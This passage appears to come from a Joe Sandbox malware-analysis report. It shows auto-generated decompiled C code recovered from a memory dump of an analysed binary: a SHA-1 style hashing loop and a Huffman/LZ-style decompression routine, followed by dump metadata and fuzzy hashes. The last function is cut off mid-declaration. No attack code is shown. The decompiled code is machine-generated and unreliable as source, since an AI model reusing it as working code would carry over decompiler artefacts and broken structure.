                					asm("rol edx, 1");
                					asm("rol ecx, 0x5");
                					_t840[_t865] = _t805;
                					_t858 = _v40;
                					_t783 = _v8;
                					asm("ror ebp, 0x2");
                					_v36 = _t900;
                					_v16 = _t783;
                					_v28 = _v28 + 0x6ed9eba1 + (_t602 ^ _t858 ^ _t900) + _v32 + _t805;
                				} while (_t783 + 3 <= 0x23);
                				_t866 = 0x25;
                				_v16 = _t866;
                				while(1) {
                					_t205 = _t866 + 5; // 0x2a
                					_t511 = _t205;
                					_t206 = _t866 - 5; // 0x20
                					_v4 = _t511;
                					_t208 = _t866 + 3; // 0x28
                					_t807 = _t208 & 0x0000000f;
                					_v8 = _t807;
                					_t902 = _t511 & 0x0000000f;
                					_t870 = _t840[_t206 & 0x0000000f] ^ _t840[_t866 & 0x0000000f] ^ _t840[_t902] ^ _t840[_t807];
                					asm("rol esi, 1");
                					_t840[_t807] = _t870;
                					asm("ror dword [esp+0x1c], 0x2");
                					asm("rol edx, 0x5");
                					_t871 = 0xf;
                					_v24 = _v28 - 0x70e44324 + ((_v36 | _v32) & _v40 | _v36 & _v32) + _t870 + _t602;
                					_t518 = _v16;
                					_t604 = _t518 + 0x00000006 & _t871;
                					_t810 = _t518 + 0x00000004 & _t871;
                					_v12 = _t810;
                					_t875 = _t840[_t518 - 0x00000004 & _t871] ^ _t840[_t518 + 0x00000001 & _t871] ^ _t840[_t810] ^ _t840[_t604];
                					asm("rol esi, 1");
                					_t840[_t810] = _t875;
                					_t844 = _v28;
                					asm("rol edx, 0x5");
                					asm("ror edi, 0x2");
                					_v28 = _t844;
                					_t812 = _v20;
                					_v40 = _v24 - 0x70e44324 + ((_v32 | _t844) & _v36 | _v32 & _t844) + _t875 + _v40;
                					_t525 = _v16;
                					_t846 = _t525 + 0x00000007 & 0x0000000f;
                					_t879 =  *(_t812 + (_t525 - 0x00000003 & 0x0000000f) * 4) ^  *(_t812 + (_t525 + 0x00000002 & 0x0000000f) * 4) ^  *(_t812 + _t846 * 4) ^  *(_t812 + _t902 * 4);
                					asm("rol esi, 1");
                					 *(_t812 + _t902 * 4) = _t879;
                					asm("rol edx, 0x5");
                					_t903 = _v24;
                					asm("ror ebp, 0x2");
                					_t815 = _v40 + 0x8f1bbcdc + ((_t903 | _v28) & _v32 | _t903 & _v28) + _t879 + _v36;
                					_v24 = _t903;
                					_t904 = _v20;
                					_v36 = _t815;
                					asm("rol edx, 0x5");
                					_t883 =  *(_t904 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t904 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t904 + _v8 * 4) ^  *(_t904 + _t604 * 4);
                					asm("rol esi, 1");
                					 *(_t904 + _t604 * 4) = _t883;
                					_t602 = _v24;
                					asm("ror dword [esp+0x10], 0x2");
                					_t816 = _t815 + ((_t602 | _v40) & _v28 | _t602 & _v40) + 0x8f1bbcdc + _t883 + _v32;
                					_v32 = _t816;
                					asm("rol edx, 0x5");
                					_t887 =  *(_t904 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t904 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t904 + _v12 * 4) ^  *(_t904 + _t846 * 4);
                					asm("rol esi, 1");
                					 *(_t904 + _t846 * 4) = _t887;
                					_t905 = _v36;
                					asm("ror ebp, 0x2");
                					_v36 = _t905;
                					_t309 = _t816 - 0x70e44324; // -4294967294
                					_t866 = _v4;
                					_v28 = _t309 + ((_v40 | _t905) & _t602 | _v40 & _t905) + _t887 + _v28;
                					_v16 = _t866;
                					if(_t866 + 3 > 0x37) {
                						break;
                					}
                					_t840 = _v20;
                				}
                				_t817 = 0x39;
                				_v16 = _t817;
                				_t847 = _t602;
                				do {
                					_t315 = _t817 + 5; // 0x3e
                					_t545 = _t315;
                					_v8 = _t545;
                					_t317 = _t817 + 3; // 0x3c
                					_t318 = _t817 - 5; // 0x34
                					_t888 = 0xf;
                					_t907 = _t317 & _t888;
                					_t606 = _t545 & _t888;
                					_t889 = _v20;
                					_v4 = _t907;
                					_t821 =  *(_t889 + (_t318 & _t888) * 4) ^  *(_t889 + (_t817 & _t888) * 4) ^  *(_t889 + _t907 * 4) ^  *(_t889 + _t606 * 4);
                					asm("rol edx, 1");
                					 *(_t889 + _t907 * 4) = _t821;
                					_t908 = _v32;
                					asm("rol ecx, 0x5");
                					asm("ror ebp, 0x2");
                					_v32 = _t908;
                					_v24 = (_v40 ^ _v36 ^ _t908) + _t821 + _t847 + _v28 + 0xca62c1d6;
                					_t554 = _v16;
                					_t822 = 0xf;
                					_t849 = _t554 + 0x00000006 & _t822;
                					_t910 = _t554 + 0x00000004 & _t822;
                					_t826 =  *(_t889 + (_t554 - 0x00000004 & _t822) * 4) ^  *(_t889 + (_t554 + 0x00000001 & _t822) * 4) ^  *(_t889 + _t910 * 4) ^  *(_t889 + _t849 * 4);
                					asm("rol edx, 1");
                					 *(_t889 + _t910 * 4) = _t826;
                					_t890 = _v28;
                					asm("rol ecx, 0x5");
                					_v40 = (_v36 ^ _v32 ^ _t890) + _t826 + _v40 + _v24 + 0xca62c1d6;
                					_t563 = _v16;
                					asm("ror esi, 0x2");
                					_v28 = _t890;
                					_t892 = _t563 + 0x00000007 & 0x0000000f;
                					_t746 = _v20;
                					_t831 = _v20[_t563 - 0x00000003 & 0x0000000f] ^  *(_t746 + (_t563 + 0x00000002 & 0x0000000f) * 4) ^  *(_t746 + _t892 * 4) ^  *(_t746 + _t606 * 4);
                					asm("rol edx, 1");
                					 *(_t746 + _t606 * 4) = _t831;
                					_t607 = _v24;
                					asm("rol ecx, 0x5");
                					asm("ror ebx, 0x2");
                					_v24 = _t607;
                					_t608 = _v20;
                					_v36 = (_t607 ^ _v32 ^ _v28) + _t831 + _v36 + _v40 + 0xca62c1d6;
                					asm("rol ecx, 0x5");
                					_t835 = _t608[_v16 - 0x00000008 & 0x0000000f] ^ _t608[_v16 + 0xfffffffe & 0x0000000f] ^ _t608[_v4] ^ _t608[_t849];
                					asm("rol edx, 1");
                					_t608[_t849] = _t835;
                					_t847 = _v24;
                					asm("ror dword [esp+0x10], 0x2");
                					_v32 = (_t847 ^ _v40 ^ _v28) + _t835 + _v32 + _v36 + 0xca62c1d6;
                					_t839 = _t608[_v16 - 0x00000007 & 0x0000000f] ^ _t608[_v16 - 0x00000001 & 0x0000000f] ^ _t608[_t892] ^ _t608[_t910];
                					_t911 = _v36;
                					asm("rol edx, 1");
                					_t608[_t892] = _t839;
                					_t609 = _v40;
                					_t893 = _v32;
                					asm("ror ebp, 0x2");
                					_t817 = _v8;
                					asm("rol ecx, 0x5");
                					_v36 = _t911;
                					_t757 = _t893 + 0xca62c1d6 + (_t847 ^ _t609 ^ _t911) + _t839 + _v28;
                					_v16 = _t817;
                					_v28 = _t757;
                				} while (_t817 + 3 <= 0x4b);
                				_t591 = _a4;
                				_t591[1] = _t591[1] + _t893;
                				_t591[2] = _t591[2] + _t911;
                				_t591[3] = _t591[3] + _t609;
                				 *_t591 =  *_t591 + _t757;
                				_t591[4] = _t591[4] + _t847;
                				return _t591;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                • Instruction ID: 8216051f1b0033d408d33bd99ef387443e8faf55edfaea3778612ffdbfd3c517
                • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                • Instruction Fuzzy Hash: 1C523B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003E7153(signed int __ecx) {
                				void* __ebp;
                				void* _t220;
                				signed int* _t223;
                				signed int _t225;
                				signed int _t227;
                				signed int _t228;
                				signed int _t229;
                				signed int _t233;
                				signed int _t234;
                				signed short _t235;
                				signed int _t237;
                				signed int _t239;
                				signed int _t240;
                				signed int _t241;
                				signed int _t243;
                				signed int _t244;
                				signed int _t245;
                				signed int _t246;
                				unsigned int _t250;
                				signed int _t260;
                				signed int _t264;
                				signed int _t269;
                				signed int _t270;
                				signed int _t271;
                				signed int _t274;
                				signed int _t275;
                				signed short _t276;
                				signed int _t277;
                				signed int _t281;
                				signed int _t282;
                				unsigned int _t283;
                				signed int _t287;
                				signed int _t288;
                				signed int _t289;
                				signed int _t291;
                				signed int _t292;
                				signed short _t293;
                				unsigned int _t298;
                				signed int _t303;
                				unsigned int _t305;
                				signed int _t310;
                				signed short _t311;
                				signed int _t316;
                				intOrPtr* _t321;
                				signed int* _t322;
                				unsigned int _t324;
                				signed int _t325;
                				signed int _t326;
                				signed int _t329;
                				signed int _t331;
                				signed int _t332;
                				signed int _t333;
                				signed int _t334;
                				signed int _t340;
                				signed int _t342;
                				intOrPtr _t344;
                				signed int _t345;
                				signed int _t346;
                				signed int _t348;
                				void* _t349;
                				signed int _t352;
                				signed int _t353;
                				unsigned int _t356;
                				signed int _t357;
                				void* _t358;
                				signed int _t361;
                				signed int _t362;
                				void* _t365;
                				signed int _t368;
                				signed int _t369;
                				intOrPtr* _t371;
                				void* _t372;
                				signed int* _t376;
                				signed int _t379;
                				unsigned int _t382;
                				signed int _t383;
                				void* _t384;
                				signed int _t387;
                				void* _t390;
                				unsigned int _t393;
                				signed int _t394;
                				unsigned int _t397;
                				void* _t399;
                				signed int _t402;
                				intOrPtr* _t404;
                				void* _t405;
                				signed int _t408;
                				void* _t411;
                				signed int _t415;
                				signed int _t416;
                				intOrPtr* _t418;
                				void* _t419;
                				void* _t422;
                				signed int _t425;
                				intOrPtr* _t429;
                				void* _t430;
                				signed int* _t436;
                				unsigned int _t438;
                				unsigned int _t442;
                				signed int _t445;
                				signed int _t447;
                				signed int _t448;
                				signed int _t449;
                				unsigned int _t451;
                				unsigned int _t455;
                				signed int _t458;
                				unsigned int _t459;
                				signed int _t461;
                				signed int _t462;
                				void* _t463;
                				signed int _t464;
                				signed int* _t465;
                				signed char _t466;
                				signed int* _t468;
                				signed int* _t470;
                				signed int _t473;
                				signed int _t474;
                				signed int _t475;
                				signed int _t477;
                				void* _t479;
                
                				_t466 =  *(_t479 + 0x44);
                				 *(_t479 + 0x30) = __ecx;
                				_t321 = _t466 + 0x18;
                				_t465 = _t466 + 4;
                				if( *((char*)(_t466 + 0x2c)) != 0) {
                					L2:
                					_t344 =  *_t321;
                					_t220 =  *((intOrPtr*)(_t466 + 0x24)) + _t344;
                					if( *_t465 <= _t220) {
                						 *(_t466 + 0x4ad8) =  *(_t466 + 0x4ad8) & 0x00000000;
                						_t223 =  *((intOrPtr*)(_t466 + 0x20)) - 1 + _t344;
                						_t436 =  *((intOrPtr*)(_t466 + 0x4acc)) - 0x10;
                						 *(_t479 + 0x1c) = _t223;
                						 *(_t479 + 0x18) = _t436;
                						__eflags = _t223 - _t436;
                						if(_t223 >= _t436) {
                							_t468 = _t436;
                							 *(_t479 + 0x14) = _t436;
                						} else {
                							_t468 = _t223;
                							 *(_t479 + 0x14) = _t468;
                						}
                						_t322 = _t466 + 0x4ad4;
                						while(1) {
                							_t345 =  *_t465;
                							 *(_t479 + 0x10) = _t322;
                							__eflags = _t345 - _t468;
                							if(_t345 < _t468) {
                								goto L15;
                							}
                							__eflags = _t345 - _t223;
                							if(__eflags > 0) {
                								L93:
                								return _t223;
                							}
                							if(__eflags != 0) {
                								L12:
                								__eflags = _t345 - _t436;
                								if(_t345 < _t436) {
                									L14:
                									_t223 = _t466 + 0x4ad4;
                									_t322 = _t223;
                									 *(_t479 + 0x10) = _t223;
                									__eflags = _t345 -  *((intOrPtr*)(_t466 + 0x4acc));
                									if(_t345 >=  *((intOrPtr*)(_t466 + 0x4acc))) {
                										L92:
                										 *((char*)(_t466 + 0x4ad3)) = 1;
                										goto L93;
                									}
                									goto L15;
                								}
                								__eflags =  *((char*)(_t466 + 0x4ad2));
                								if( *((char*)(_t466 + 0x4ad2)) == 0) {
                									goto L92;
                								}
                								goto L14;
                							}
                							_t223 =  *(_t466 + 8);
                							__eflags = _t223 -  *((intOrPtr*)(_t466 + 0x1c));
                							if(_t223 >=  *((intOrPtr*)(_t466 + 0x1c))) {
                								goto L93;
                							}
                							goto L12;
                							L15:
                							_t346 =  *(_t466 + 0x4adc);
                							__eflags =  *(_t466 + 0x4ad8) - _t346 - 8;
                							if( *(_t466 + 0x4ad8) > _t346 - 8) {
                								_t316 = _t346 + _t346;
                								 *(_t466 + 0x4adc) = _t316;
                								_push(_t316 * 0xc);
                								_push( *_t322);
                								_t477 = E003F3E3E(_t346, _t436);
                								__eflags = _t477;
                								if(_t477 == 0) {
                									E003D6CA7(0x411098);
                								}
                								 *_t322 = _t477;
                							}
                							_t225 =  *(_t466 + 0x4ad8);
                							_t470 = _t225 * 0xc +  *_t322;
                							 *(_t479 + 0x2c) = _t470;
                							 *(_t466 + 0x4ad8) = _t225 + 1;
                							_t227 = E003DA89D(_t465);
                							_t228 =  *(_t466 + 0xb4);
                							_t438 = _t227 & 0x0000fffe;
                							__eflags = _t438 -  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4));
                							if(_t438 >=  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4))) {
                								_t348 = 0xf;
                								_t229 = _t228 + 1;
                								 *(_t479 + 0x28) = _t348;
                								__eflags = _t229 - _t348;
                								if(_t229 >= _t348) {
                									L27:
                									_t324 = _t465[1] + _t348;
                									_t325 = _t324 & 0x00000007;
                									 *_t465 =  *_t465 + (_t324 >> 3);
                									 *(_t479 + 0x18) =  *_t465;
                									_t233 =  *(_t479 + 0x28);
                									_t465[1] = _t325;
                									_t349 = 0x10;
                									_t352 =  *((intOrPtr*)(_t466 + 0x74 + _t233 * 4)) + (_t438 -  *((intOrPtr*)(_t466 + 0x30 + _t233 * 4)) >> _t349 - _t233);
                									__eflags = _t352 -  *((intOrPtr*)(_t466 + 0x30));
                									asm("sbb eax, eax");
                									_t234 = _t233 & _t352;
                									__eflags = _t234;
                									_t235 =  *(_t466 + 0xcb8 + _t234 * 2) & 0x0000ffff;
                									goto L28;
                								}
                								_t429 = _t466 + 0x34 + _t229 * 4;
                								while(1) {
                									__eflags = _t438 -  *_t429;
                									if(_t438 <  *_t429) {
                										break;
                									}
                									_t229 = _t229 + 1;
                									_t429 = _t429 + 4;
                									__eflags = _t229 - 0xf;
                									if(_t229 < 0xf) {
                										continue;
                									}
                									_t348 =  *(_t479 + 0x28);
                									goto L27;
                								}
                								_t348 = _t229;
                								 *(_t479 + 0x28) = _t229;
                								goto L27;
                							} else {
                								_t430 = 0x10;
                								_t464 = _t438 >> _t430 - _t228;
                								_t342 = ( *(_t464 + _t466 + 0xb8) & 0x000000ff) + _t465[1];
                								 *_t465 =  *_t465 + (_t342 >> 3);
                								_t325 = _t342 & 0x00000007;
                								 *(_t479 + 0x18) =  *_t465;
                								_t465[1] = _t325;
                								_t235 =  *(_t466 + 0x4b8 + _t464 * 2) & 0x0000ffff;
                								L28:
                								_t353 = _t235 & 0x0000ffff;
                								__eflags = _t353 - 0x100;
                								if(_t353 >= 0x100) {
                									__eflags = _t353 - 0x106;
                									if(_t353 < 0x106) {
                										__eflags = _t353 - 0x100;
                										if(_t353 != 0x100) {
                											__eflags = _t353 - 0x101;
                											if(_t353 != 0x101) {
                												_t237 = 3;
                												 *_t470 = _t237;
                												_t470[2] = _t353 - 0x102;
                												_t239 = E003DA89D(_t465);
                												_t240 =  *(_t466 + 0x2d78);
                												_t442 = _t239 & 0x0000fffe;
                												__eflags = _t442 -  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4));
                												if(_t442 >=  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4))) {
                													_t326 = 0xf;
                													_t241 = _t240 + 1;
                													__eflags = _t241 - _t326;
                													if(_t241 >= _t326) {
                														L86:
                														_t356 = _t465[1] + _t326;
                														_t357 = _t356 & 0x00000007;
                														_t465[1] = _t357;
                														_t243 = _t356 >> 3;
                														 *_t465 =  *_t465 + _t243;
                														 *(_t479 + 0x30) = _t357;
                														_t358 = 0x10;
                														_t361 =  *((intOrPtr*)(_t466 + 0x2d38 + _t326 * 4)) + (_t442 -  *((intOrPtr*)(_t466 + 0x2cf4 + _t326 * 4)) >> _t358 - _t326);
                														__eflags = _t361 -  *((intOrPtr*)(_t466 + 0x2cf4));
                														asm("sbb eax, eax");
                														_t244 = _t243 & _t361;
                														__eflags = _t244;
                														_t245 =  *(_t466 + 0x397c + _t244 * 2) & 0x0000ffff;
                														L87:
                														_t246 = _t245 & 0x0000ffff;
                														__eflags = _t246 - 8;
                														if(_t246 >= 8) {
                															_t362 = 3;
                															_t329 = (_t246 >> 2) - 1;
                															_t445 = ((_t246 & _t362 | 0x00000004) << _t329) + 2;
                															 *(_t479 + 0x2c) = _t445;
                															__eflags = _t329;
                															if(_t329 != 0) {
                																_t250 = E003DA89D(_t465);
                																_t365 = 0x10;
                																_t445 =  *(_t479 + 0x2c) + (_t250 >> _t365 - _t329);
                																_t368 =  *(_t479 + 0x30) + _t329;
                																 *_t465 =  *_t465 + (_t368 >> 3);
                																_t369 = _t368 & 0x00000007;
                																__eflags = _t369;
                																_t465[1] = _t369;
                															}
                														} else {
                															_t445 = _t246 + 2;
                														}
                														_t470[1] = _t445;
                														L33:
                														_t322 =  *(_t479 + 0x10);
                														L34:
                														_t436 =  *(_t479 + 0x1c);
                														_t223 =  *(_t479 + 0x20);
                														_t468 =  *(_t479 + 0x14);
                														continue;
                													}
                													_t371 = _t466 + 0x2cf8 + _t241 * 4;
                													while(1) {
                														__eflags = _t442 -  *_t371;
                														if(_t442 <  *_t371) {
                															break;
                														}
                														_t241 = _t241 + 1;
                														_t371 = _t371 + 4;
                														__eflags = _t241 - 0xf;
                														if(_t241 < 0xf) {
                															continue;
                														}
                														goto L86;
                													}
                													_t326 = _t241;
                													goto L86;
                												}
                												_t372 = 0x10;
                												_t447 = _t442 >> _t372 - _t240;
                												_t331 = ( *(_t447 + _t466 + 0x2d7c) & 0x000000ff) + _t465[1];
                												 *_t465 =  *_t465 + (_t331 >> 3);
                												_t332 = _t331 & 0x00000007;
                												_t465[1] = _t332;
                												_t245 =  *(_t466 + 0x317c + _t447 * 2) & 0x0000ffff;
                												 *(_t479 + 0x30) = _t332;
                												goto L87;
                											}
                											 *_t470 = 2;
                											goto L33;
                										}
                										_push(_t479 + 0x38);
                										E003E3F9D( *((intOrPtr*)(_t479 + 0x34)), _t465);
                										_t322 =  *(_t479 + 0x10);
                										_t470[1] =  *(_t479 + 0x38) & 0x000000ff;
                										_t470[2] =  *(_t479 + 0x3c);
                										_t448 = 4;
                										 *_t470 = _t448;
                										_t260 =  *(_t466 + 0x4ad8);
                										_t376 = _t260 * 0xc +  *_t322;
                										 *(_t466 + 0x4ad8) = _t260 + 1;
                										_t376[1] =  *(_t479 + 0x44) & 0x000000ff;
                										 *_t376 = _t448;
                										_t376[2] =  *(_t479 + 0x40);
                										goto L34;
                									}
                									_t264 = _t353 - 0x106;
                									__eflags = _t264 - 8;
                									if(_t264 >= 8) {
                										_t449 = 3;
                										_t379 = (_t264 >> 2) - 1;
                										 *(_t479 + 0x30) = _t379;
                										 *(_t479 + 0x24) = ((_t264 & _t449 | 0x00000004) << _t379) + 2;
                										__eflags = _t379;
                										if(_t379 != 0) {
                											_t305 = E003DA89D(_t465);
                											_t340 = _t325 +  *(_t479 + 0x30);
                											_t422 = 0x10;
                											 *(_t479 + 0x24) =  *(_t479 + 0x24) + (_t305 >> _t422 -  *(_t479 + 0x30));
                											_t425 =  *(_t479 + 0x18) + (_t340 >> 3);
                											_t325 = _t340 & 0x00000007;
                											__eflags = _t325;
                											 *(_t479 + 0x18) = _t425;
                											 *_t465 = _t425;
                											_t465[1] = _t325;
                										}
                									} else {
                										 *(_t479 + 0x24) = _t264 + 2;
                									}
                									_t269 = E003DA89D(_t465);
                									_t270 =  *(_t466 + 0xfa0);
                									_t451 = _t269 & 0x0000fffe;
                									__eflags = _t451 -  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4));
                									if(_t451 >=  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4))) {
                										_t333 = 0xf;
                										_t271 = _t270 + 1;
                										__eflags = _t271 - _t333;
                										if(_t271 >= _t333) {
                											L49:
                											_t382 = _t465[1] + _t333;
                											_t383 = _t382 & 0x00000007;
                											_t465[1] = _t383;
                											 *_t465 =  *_t465 + (_t382 >> 3);
                											_t274 =  *_t465;
                											 *(_t479 + 0x18) = _t383;
                											_t384 = 0x10;
                											 *(_t479 + 0x28) = _t274;
                											_t387 =  *((intOrPtr*)(_t466 + 0xf60 + _t333 * 4)) + (_t451 -  *((intOrPtr*)(_t466 + 0xf1c + _t333 * 4)) >> _t384 - _t333);
                											__eflags = _t387 -  *((intOrPtr*)(_t466 + 0xf1c));
                											asm("sbb eax, eax");
                											_t275 = _t274 & _t387;
                											__eflags = _t275;
                											_t276 =  *(_t466 + 0x1ba4 + _t275 * 2) & 0x0000ffff;
                											goto L50;
                										}
                										_t418 = _t466 + 0xf20 + _t271 * 4;
                										while(1) {
                											__eflags = _t451 -  *_t418;
                											if(_t451 <  *_t418) {
                												break;
                											}
                											_t271 = _t271 + 1;
                											_t418 = _t418 + 4;
                											__eflags = _t271 - 0xf;
                											if(_t271 < 0xf) {
                												continue;
                											}
                											goto L49;
                										}
                										_t333 = _t271;
                										goto L49;
                									} else {
                										_t419 = 0x10;
                										_t459 = _t451 >> _t419 - _t270;
                										 *(_t479 + 0x30) = _t459;
                										_t461 = ( *(_t459 + _t466 + 0xfa4) & 0x000000ff) + _t325;
                										_t303 = (_t461 >> 3) +  *(_t479 + 0x18);
                										_t462 = _t461 & 0x00000007;
                										 *(_t479 + 0x28) = _t303;
                										 *_t465 = _t303;
                										_t465[1] = _t462;
                										 *(_t479 + 0x18) = _t462;
                										_t276 =  *(_t466 + 0x13a4 +  *(_t479 + 0x30) * 2) & 0x0000ffff;
                										L50:
                										_t277 = _t276 & 0x0000ffff;
                										__eflags = _t277 - 4;
                										if(_t277 >= 4) {
                											_t473 = (_t277 >> 1) - 1;
                											_t281 = ((_t277 & 0x00000001 | 0x00000002) << _t473) + 1;
                											 *(_t479 + 0x30) = _t281;
                											_t334 = _t281;
                											__eflags = _t473;
                											if(_t473 == 0) {
                												L68:
                												_t470 =  *(_t479 + 0x2c);
                												L69:
                												_t282 =  *(_t479 + 0x24);
                												__eflags = _t334 - 0x100;
                												if(_t334 > 0x100) {
                													_t282 = _t282 + 1;
                													__eflags = _t334 - 0x2000;
                													if(_t334 > 0x2000) {
                														_t282 = _t282 + 1;
                														__eflags = _t334 - 0x40000;
                														if(_t334 > 0x40000) {
                															_t282 = _t282 + 1;
                															__eflags = _t282;
                														}
                													}
                												}
                												 *_t470 = 1;
                												_t470[1] = _t282;
                												_t470[2] = _t334;
                												goto L33;
                											}
                											__eflags = _t473 - 4;
                											if(__eflags < 0) {
                												_t283 = E003E8934(_t465);
                												_t390 = 0x20;
                												_t334 = (_t283 >> _t390 - _t473) +  *(_t479 + 0x30);
                												_t393 =  *(_t479 + 0x18) + _t473;
                												_t394 = _t393 & 0x00000007;
                												__eflags = _t394;
                												 *_t465 = (_t393 >> 3) +  *(_t479 + 0x28);
                												_t465[1] = _t394;
                												goto L68;
                											}
                											if(__eflags <= 0) {
                												_t474 =  *(_t479 + 0x28);
                											} else {
                												_t298 = E003E8934(_t465);
                												_t411 = 0x24;
                												_t334 = (_t298 >> _t411 - _t473 << 4) +  *(_t479 + 0x30);
                												_t415 =  *(_t479 + 0x18) + 0xfffffffc + _t473;
                												_t474 =  *(_t479 + 0x28) + (_t415 >> 3);
                												_t416 = _t415 & 0x00000007;
                												 *_t465 = _t474;
                												 *(_t479 + 0x18) = _t416;
                												_t465[1] = _t416;
                											}
                											_t287 = E003DA89D(_t465);
                											_t288 =  *(_t466 + 0x1e8c);
                											_t455 = _t287 & 0x0000fffe;
                											__eflags = _t455 -  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4));
                											if(_t455 >=  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4))) {
                												_t475 = 0xf;
                												_t289 = _t288 + 1;
                												__eflags = _t289 - _t475;
                												if(_t289 >= _t475) {
                													L65:
                													_t397 = _t465[1] + _t475;
                													_t465[1] = _t397 & 0x00000007;
                													_t291 = _t397 >> 3;
                													 *_t465 =  *_t465 + _t291;
                													_t399 = 0x10;
                													_t402 =  *((intOrPtr*)(_t466 + 0x1e4c + _t475 * 4)) + (_t455 -  *((intOrPtr*)(_t466 + 0x1e08 + _t475 * 4)) >> _t399 - _t475);
                													__eflags = _t402 -  *((intOrPtr*)(_t466 + 0x1e08));
                													asm("sbb eax, eax");
                													_t292 = _t291 & _t402;
                													__eflags = _t292;
                													_t293 =  *(_t466 + 0x2a90 + _t292 * 2) & 0x0000ffff;
                													goto L66;
                												}
                												_t404 = _t466 + 0x1e0c + _t289 * 4;
                												while(1) {
                													__eflags = _t455 -  *_t404;
                													if(_t455 <  *_t404) {
                														break;
                													}
                													_t289 = _t289 + 1;
                													_t404 = _t404 + 4;
                													__eflags = _t289 - 0xf;
                													if(_t289 < 0xf) {
                														continue;
                													}
                													goto L65;
                												}
                												_t475 = _t289;
                												goto L65;
                											} else {
                												_t405 = 0x10;
                												_t458 = _t455 >> _t405 - _t288;
                												_t408 = ( *(_t458 + _t466 + 0x1e90) & 0x000000ff) +  *(_t479 + 0x18);
                												 *_t465 = (_t408 >> 3) + _t474;
                												_t465[1] = _t408 & 0x00000007;
                												_t293 =  *(_t466 + 0x2290 + _t458 * 2) & 0x0000ffff;
                												L66:
                												_t334 = _t334 + (_t293 & 0x0000ffff);
                												goto L68;
                											}
                										}
                										_t334 = _t277 + 1;
                										goto L69;
                									}
                								}
                								__eflags =  *(_t466 + 0x4ad8) - 1;
                								if( *(_t466 + 0x4ad8) <= 1) {
                									L35:
                									 *_t470 =  *_t470 & 0x00000000;
                									_t470[2] = _t353;
                									_t470[1] = 0;
                									goto L33;
                								}
                								__eflags =  *(_t470 - 0xc);
                								if( *(_t470 - 0xc) != 0) {
                									goto L35;
                								}
                								_t310 =  *(_t470 - 8) & 0x0000ffff;
                								_t463 = 3;
                								__eflags = _t310 - _t463;
                								if(_t310 >= _t463) {
                									goto L35;
                								}
                								_t311 = _t310 + 1;
                								 *(_t470 - 8) = _t311;
                								 *((_t311 & 0x0000ffff) + _t470 - 4) = _t353;
                								_t72 = _t466 + 0x4ad8;
                								 *_t72 =  *(_t466 + 0x4ad8) - 1;
                								__eflags =  *_t72;
                								goto L33;
                							}
                						}
                					}
                					L3:
                					 *((char*)(_t466 + 0x4ad0)) = 1;
                					return _t220;
                				}
                				 *((char*)(_t466 + 0x2c)) = 1;
                				_push(_t466 + 0x30);
                				_push(_t321);
                				_push(_t465);
                				_t220 = E003E43BF(__ecx);
                				if(_t220 == 0) {
                					goto L3;
                				}
                				goto L2;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ffb42145b5e767f18ee67e45adf12e2c1a95711ce4dc362e3d3b7109edbe5567
                • Instruction ID: bc38c70cd2eecf0fa8a0b490025de6456e4bea3acf72a47f3839822365b09aa8
                • Opcode Fuzzy Hash: ffb42145b5e767f18ee67e45adf12e2c1a95711ce4dc362e3d3b7109edbe5567
                • Instruction Fuzzy Hash: BE12D1B16187568FC72ACF29C480AB9B7E0FF94304F104A2EE996C7780E334A995DB45
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DC426(signed char** __ecx) {
                				void* __edi;
                				void* _t188;
                				signed int _t189;
                				char _t192;
                				void* _t197;
                				void* _t198;
                				signed int _t201;
                				signed char _t202;
                				void* _t212;
                				signed int _t213;
                				signed int _t215;
                				signed int _t216;
                				signed char* _t217;
                				void* _t218;
                				intOrPtr _t222;
                				signed char* _t225;
                				signed char _t228;
                				void* _t237;
                				void* _t238;
                				signed int _t239;
                				signed int _t242;
                				signed char* _t245;
                				signed int _t277;
